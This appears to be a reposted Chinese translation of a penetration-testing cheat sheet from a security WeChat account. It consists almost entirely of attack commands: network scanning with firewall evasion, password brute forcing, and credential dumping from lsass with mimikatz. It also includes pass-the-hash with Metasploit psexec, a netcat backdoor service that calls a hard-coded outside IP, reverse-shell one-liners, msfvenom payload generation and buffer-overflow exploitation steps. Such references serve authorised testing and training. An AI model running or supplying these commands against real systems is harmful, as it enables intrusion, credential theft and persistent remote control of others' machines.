【新朋友】點擊標題下面藍字「皮魯安全之家」關注
【老朋友】點擊右上角,分享或收藏本頁精彩內容
【公眾號】搜索公眾號:皮魯安全之家,或者ID :piluwill
本文為作者總結自己在滲透測試中常用的一些小技巧。原文分為兩部分,譯者將其合二為一,方便大家查閱。
$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt$ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt$ grep "open" FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "T:"$0}'$ grep "open" FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "U:"$0}'$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt
Nmap – 躲避防火牆$ nmap -f$ nmap --mtu 24$ nmap -D RND:10 [target]$ nmap -D decoy1,decoy2,decoy3 etc.$ nmap -sI [Zombie IP] [Target IP]$ nmap --source-port 80 IP$ nmap --data-length 25 IP$ nmap --spoof-mac Dell/Apple/3Com IP
Nmap 進行 Web 漏洞掃描cd /usr/share/nmap/scripts/wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gznmap -sS -sV --script=vulscan/vulscan.nse targetnmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv targetnmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 targetnmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 targetnmap -sV --script=vuln targetnmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target
使用 DIRB 爆破目錄註:DIRB http://dirb.sourceforge.net/是一個專門用於爆破目錄的工具,在 Kali 中默認已經安裝,類似工具還有國外的patator https://github.com/lanjelot/patator,dirsearch https://github.com/maurosoria/dirsearch,DirBuster https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project, 國內的御劍等等。
dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt
Patator – 全能暴力破解測試工具$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst$ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'
使用 Fierce 爆破 DNS註:Fierce 會檢查 DNS 伺服器是否允許區域傳送。如果允許,就會進行區域傳送並通知用戶,如果不允許,則可以通過查詢 DNS 伺服器枚舉主機名。類似工具:subDomainsBrute https://github.com/lijiejie/subDomainsBrute 和 SubBrute https://github.com/TheRook/subbrute/ 等等
$ ./fierce.pl -dns example.com$ ./fierce.pl –dns example.com –wordlist myWordList.txt
使用 Nikto 掃描 Web 服務nikto -C all -h http://IP
掃描 WordPressgit clone https://github.com/wpscanteam/wpscan.git && cd wpscan./wpscan –url http://IP/ –enumerate p
HTTP 指紋識別wget http:cd httprint_301/linux/./httprint -h http:
使用 Skipfish 掃描註:Skipfish 是一款 Web 應用安全偵查工具,Skipfish 會利用遞歸爬蟲和基於字典的探針生成一幅交互式網站地圖,最終生成的地圖會在通過安全檢查後輸出。
skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http:
使用 NC 掃描nc -v -w 1 target -z 1-1000for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
Unicornscan註:Unicornscan http://www.unicornscan.org/ 是一個信息收集和安全審計的工具。
us -H -msf -Iv 192.168.56.101 -p 1-65535us -H -mU -Iv 192.168.56.101 -p 1-65535-H 在生成報告階段解析主機名-m 掃描類型 (sf - tcp, U - udp)-Iv - 詳細
使用 Xprobe2 識別作業系統指紋xprobe2 -v -p tcp:80:open IP
枚舉 Sambanmblookup -A targetsmbclient rpcclient -U "" targetenum4linux target
枚舉 SNMPsnmpget -v 1 -c public IPsnmpwalk -v 1 -c public IPsnmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
實用的 Windows cmd 命令net localgroup Usersnet localgroup Administratorssearch dir/s *.docsystem("start cmd.exe /k $cmd")sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"Procdump.exe -accepteula -ma lsass.exe lsass.dmpmimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp 32 位系統C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp 64 位系統
PuTTY 連接隧道轉發遠程埠到目標地址plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP
Meterpreter 埠轉發meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141kali > rdesktop 127.0.0.1:3389
開啟 RDP 服務reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0netsh firewall set service remoteadmin enablenetsh firewall set service remotedesktop enable
關閉 Windows 防火牆netsh firewall set opmode disable
Meterpreter VNC\RDP# https:run getgui -u admin -p 1234run vnc -p 5043
使用 Mimikatz獲取 Windows 明文用戶名密碼
git clone https:privilege::debugsekurlsa::logonPasswords full
獲取哈希值git clone https:pth-winexe -U hash 或者apt-get install freerdp-x11xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP在或者meterpreter > run post/windows/gather/hashdumpAdministrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::msf > use exploit/windows/smb/psexecmsf exploit(psexec) > set payload windows/meterpreter/reverse_tcpmsf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586cmsf exploit(psexec) > exploitmeterpreter > shell
使用 Hashcat 破解密碼hashcat -m 400 -a 0 hash /root/rockyou.txt
使用 NC 抓取 Banner 信息nc 192.168.0.10 80GET / HTTP/1.1Host: 192.168.0.10User-Agent: Mozilla/4.0Referrer: www.example.com<enter><enter>
使用 NC 在 Windows 上反彈 shellc:>nc -Lp 31337 -vv -e cmd.exenc 192.168.0.10 31337c:>nc example.com 80 -e cmd.exenc -lp 80nc -lp 31337 -e /bin/bashnc 192.168.0.10 31337nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000
查找 SUID\SGID root 文件find / -user root -perm -4000 -printfind / -group root -perm -2000 -printfind / -perm -4000 -o -perm -2000 -printfind / -nouser -printfind / -nogroup -printfind / -type l -ls
Python shellpython -c 'import pty;pty.spawn("/bin/bash")'
Python\Ruby\PHP HTTP 伺服器python2 -m SimpleHTTPServerpython3 -m http.serverruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888,
ocumentRoot => Dir.pwd).start"php -S 0.0.0.0:8888
fuser -nv tcp 80fuser -k -n tcp 80
使用 Hydra 爆破 RDPhydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp
掛載遠程 Windows 共享文件夾smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
Kali 下編譯 Exploitgcc -m32 -o output32 hello.c (32 位)gcc -m64 -o output hello.c (64 位)
Kali 下編譯 Windows Exploitwget -O mingw-get-setup.exe http:wine mingw-get-setup.exeselect mingw32-basecd /root/.wine/drive_c/windowswget http:cd /root/.wine/drive_c/MinGW/binwine gcc -o ability.exe /tmp/exploit.c -lwsock32wine ability.exe
NASM 命令註:NASM 全稱 The Netwide Assembler,是一款基於80×86和x86-64平臺的彙編語言編譯程序,其設計初衷是為了實現編譯器程序跨平臺和模塊化的特性。
nasm -f bin -o payload.bin payload.asmnasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
SSH 穿透ssh -D 127.0.0.1:1080 -p 22 user@IPAdd socks4 127.0.0.1 1080 in /etc/proxychains.confproxychains commands target
SSH 穿透從一個網絡到另一個網絡ssh -D 127.0.0.1:1080 -p 22 user1@IP1Add socks4 127.0.0.1 1080 in /etc/proxychains.confproxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2Add socks4 127.0.0.1 1081 in /etc/proxychains.confproxychains commands target
使用 metasploit 進行穿透route add X.X.X.X 255.255.255.0 1use auxiliary/server/socks4arunproxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E或者meterpreter > ipconfigIP Address : 10.1.13.3meterpreter > run autoroute -s 10.1.13.0/24meterpreter > run autoroute -p10.1.13.0 255.255.255.0 Session 1meterpreter > Ctrl+Zmsf auxiliary(tcp) > use exploit/windows/smb/psexecmsf exploit(psexec) > set RHOST 10.1.13.2msf exploit(psexec) > exploitmeterpreter > ipconfigIP Address : 10.1.13.2
基於 CSV 文件查詢 Exploit-DBgit clone https://github.com/offensive-security/exploit-database.gitcd exploit-database./searchsploit –u./searchsploit apache 2.2./searchsploit "Linux Kernel"cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3
MSF Payloadsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exemsfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.phpmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.aspmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c
MSF 生成在 Linux 下反彈的 Meterpreter Shellmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell
MSF 生成反彈 Shell (C Shellcode)msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c
MSF 生成反彈 Python Shellmsfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
MSF 生成反彈 ASP Shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp
MSF 生成反彈 Bash Shellmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh
MSF 生成反彈 PHP Shellmsfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.phpadd <?php at the beginningperl -i~ -0777pe's/^/<?php \n/' shell.php
MSF 生成反彈 Win Shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe
Linux 常用安全命令find / -uid 0 -perm -4000find / -perm -o=wfind / -name " " -printfind / -name ".." -printfind / -name ". " -printfind / -name " " -printfind / -nouserlsof +L1lsof -iarp -agetent passwdgetent groupfor user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; donecat /dev/urandom| tr -dc 『a-zA-Z0-9-_!@find . | xargs -I file lsattr -a file 2>/dev/null | grep 『^….i』chattr -i file
Windows 緩衝區溢出利用命令msfvenom -p windows/shell_bind_tcp -a x86 msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 COMMONLY USED BAD CHARACTERS:\x00\x0a\x0d\x20 For http request\x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_)# 常用命令:pattern createpattern offset (EIP Address)pattern offset (ESP Address)add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )!pvefindaddr pattern_create 5000!pvefindaddr suggest!pvefindaddr modules!pvefindaddr nosafeseh!mona config -set workingfolder C:\Mona\%p!mona config -get workingfolder!mona mod!mona bytearray -b "\x00\x0a"!mona pc 5000!mona po EIP!mona suggest
SEH – 結構化異常處理註:SEH(「Structured Exception Handling」),即結構化異常處理,是 windows 作業系統提供給程序設計者的強有力的處理程序錯誤或異常的武器。
# https:# http:!mona suggest!mona nosafesehnseh="\xeb\x06\x90\x90" (next seh chain)iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)
ROP (DEP)註:ROP(「Return-Oriented Programming」)是計算機安全漏洞利用技術,該技術允許攻擊者在安全防禦的情況下執行代碼,如不可執行的內存和代碼籤名。
DEP(「Data Execution Prevention」)是一套軟硬體技術,在內存上嚴格將代碼和數據進行區分,防止數據當做代碼執行。
# https:# https:# https:# http:!mona modules!mona ropfunc -m *.dll -cpb "\x00\x09\x0a"!mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest)
ASLR – 地址空間格局隨機化# https:# http:!mona noaslr
尋蛋(EGG Hunter)技術Egg hunting這種技術可以被歸為「分級shellcode」,它主要可以支持你用一小段特製的shellcode來找到你的實際的(更大的)shellcode(我們的『雞蛋『),原理就是通過在內存中搜索我們的最終shellcode。換句話說,一段短代碼先執行,然後再去尋找真正的shellcode並執行。– 參考自看雪論壇 http://www.pediy.com/kssd/pediy11/120392.html,更多詳情可以查閱我在代碼注釋中增加的連結。
!mona jmp -r esp!mona egg -t lxxl\xeb\xc4 (jump backward -60)buff=lxxllxxl+shell!mona egg -t 'w00t'
*原文:jivoi http://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/,xiaix編譯,來自FreeBuf
回復
獲得以下圖文等信息
論壇
可進入微論壇暢談
任意
官方機器人陪聊
首頁
查看技術文檔(逐步更新中)
留言
進入留言板
相冊
國內外大牛真容